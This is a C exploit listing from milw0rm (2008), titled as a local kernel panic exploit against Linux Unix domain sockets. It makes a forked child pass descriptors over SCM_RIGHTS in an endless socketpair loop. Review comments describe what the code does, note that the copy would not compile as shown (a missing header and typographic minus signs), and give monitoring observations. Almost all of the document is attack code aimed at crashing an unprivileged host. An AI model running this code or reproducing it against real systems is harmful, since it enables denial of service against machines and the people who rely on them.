
Linux Kernel 2.4.36.92.6.27.5 Unix Sockets Local Kernel Panic Exploit by h3m4n


   1   #include     <sys/socket.h>
   2   #include     <sys/un.h>
   3   #include     <unistd.h>
   4   #include     <assert.h>
   5   #include     <err.h>
   6   #include     <stdlib.h>
/*
 * Child half of the descriptor chain.
 *
 * fork()s.  The parent closes us[1] (the send end) and returns the child's
 * pid.  The child closes us[0] (the receive end) and then loops forever:
 * it creates a fresh socketpair, passes one end (s[0]) over the current
 * send socket as a single SCM_RIGHTS control message carrying one int,
 * closes s[0] and the send socket, and makes the pair's other end (s[1])
 * the send socket for the next iteration.  The child never returns; every
 * failure path calls err()/errx(), which exits.
 *
 * NOTE(review): memset() is called but <string.h> is not among the
 * includes of this listing, and the minus signs in the code are rendered
 * as U+2212 (a typographic minus) by the page that hosts it; treat the
 * listing as a transcript rather than a compilable file.
 *
 * NOTE(review): nothing in this listing waits for or terminates the
 * child, so it keeps looping after the parent has exited.  From a
 * monitoring point of view the observable behaviour is an unprivileged
 * process that creates socketpairs in a tight loop and hands one end of
 * each pair to the previous socket via SCM_RIGHTS.
 *
 * @param us  two-element array from socketpair(); us[0] is the parent's
 *            receive end, us[1] the child's initial send end.
 * @return    the child's pid (parent only); the child does not return.
 */
static int own_child(int *us)
{
        int pid;
        int s[2];                  /* the socketpair created on each iteration */
        struct msghdr mh;
        char crap[1024];           /* ancillary-data buffer for the cmsg */
        struct iovec iov;
        struct cmsghdr *c;
        int *fd;                   /* the int slot inside the SCM_RIGHTS cmsg */
        int rc;

        pid = fork();
        if (pid == −1)
                err(1, "fork()");

        if (pid) {
                /* parent: keep only the receive end */
                close(us[1]);

                return pid;
        }

        /* child: keep only the send end */
        close(us[0]);

        /* One byte of payload so sendmsg() has data to carry the cmsg with. */
        memset(&mh, 0, sizeof(mh));
        iov.iov_base = "a";
        iov.iov_len = 1;

        mh.msg_iov           =   &iov;
        mh.msg_iovlen        =   1;
        mh.msg_control       =   crap;
        mh.msg_controllen    =   sizeof(crap);

        /* The cmsg header is built once; only the int inside it changes per loop. */
        c = CMSG_FIRSTHDR(&mh);
        assert(c);

        c−>cmsg_level = SOL_SOCKET;
        c−>cmsg_type = SCM_RIGHTS;

        fd = (int*) CMSG_DATA(c);
        assert(fd);

        /* Shrink controllen to exactly one descriptor's worth. */
        c−>cmsg_len = CMSG_LEN(sizeof(int));
        mh.msg_controllen = c−>cmsg_len;

        while (1) {
                if (socketpair(PF_UNIX, SOCK_STREAM, 0, s) == −1)
                        err(1, "socketpair()");

                /* pass s[0] over the current send socket */
                *fd = s[0];

                rc = sendmsg(us[1], &mh, 0);
                if (rc == −1)
                        err(1, "sendmsg()");

                /* NOTE(review): int compared against size_t iov_len (signed/unsigned). */
                if (rc != iov.iov_len)
                        errx(1, "sent short");

                /* Drop both the sent end and the socket it was sent over;
                 * the next send goes out via the peer of the end just passed. */
                close(s[0]);
                close(us[1]);
                us[1] = s[1];
        }
}
/*
 * Parent side: receive one passed descriptor from the child.
 *
 * On the first call (pid == 0) creates the socketpair us and forks the
 * child with own_child().  pid and us are static so they would persist
 * across calls, but main() in this listing calls own() only once.  The
 * function then performs a single recvmsg() on us[0] with a 1024-byte
 * ancillary buffer, exits via err()/errx() on error or EOF, takes the
 * first control message as SCM_RIGHTS, closes us[0] and replaces it with
 * the received descriptor.  The received descriptor is still open when
 * the function returns; the caller exits right after.
 *
 * NOTE(review): the received cmsg is validated only by assert() on
 * cmsg_type.  cmsg_level, cmsg_len and the MSG_CTRUNC bit in
 * mh.msg_flags are not examined, and assert() compiles out under NDEBUG,
 * so a reader should not take these checks as input validation.
 * `morte` is only the data buffer for the one-byte payload and is never
 * read after recvmsg().
 */
static void own(void)
{
        static int pid;            /* child pid; 0 until own_child() has run */
        static int us[2];          /* us[0]: receive end; us[1]: child's send end */
        char crap[1024];           /* ancillary-data buffer */
        char morte[1024];          /* payload buffer */
        struct cmsghdr *c;
        int rc;
        struct msghdr mh;
        struct iovec iov;
        int *fds;                  /* the int inside the received SCM_RIGHTS cmsg */

        if (!pid) {
                if (socketpair(PF_UNIX, SOCK_STREAM, 0, us) == −1)
                        err(1, "socketpair()");
                pid = own_child(us);
        }

        iov.iov_base = morte;
        iov.iov_len = sizeof(morte);

        memset(&mh, 0, sizeof(mh));
        mh.msg_iov        = &iov;
        mh.msg_iovlen     = 1;
        mh.msg_control    = crap;
        mh.msg_controllen = sizeof(crap);

        rc = recvmsg(us[0], &mh, 0);
        if (rc == −1)
                err(1, "recvmsg()");

        if (rc == 0)
                errx(1, "EOF");

        c = CMSG_FIRSTHDR(&mh);
        assert(c);
        assert(c−>cmsg_type == SCM_RIGHTS);

        fds = (int*) CMSG_DATA(c);
        assert(fds);

        /* Replace our receive end with the descriptor the child passed. */
        close(us[0]);
        us[0] = *fds;
}
/*
 * Entry point: run one round of own() and terminate with status 0.
 * Command-line arguments are accepted but unused.
 */
int main(int argc, char *argv[])
{
        (void)argc;
        (void)argv;

        own();
        exit(0);
}
// milw0rm.com [2008-11-11]




Andrea Bittau                                                                             11/11/2008

								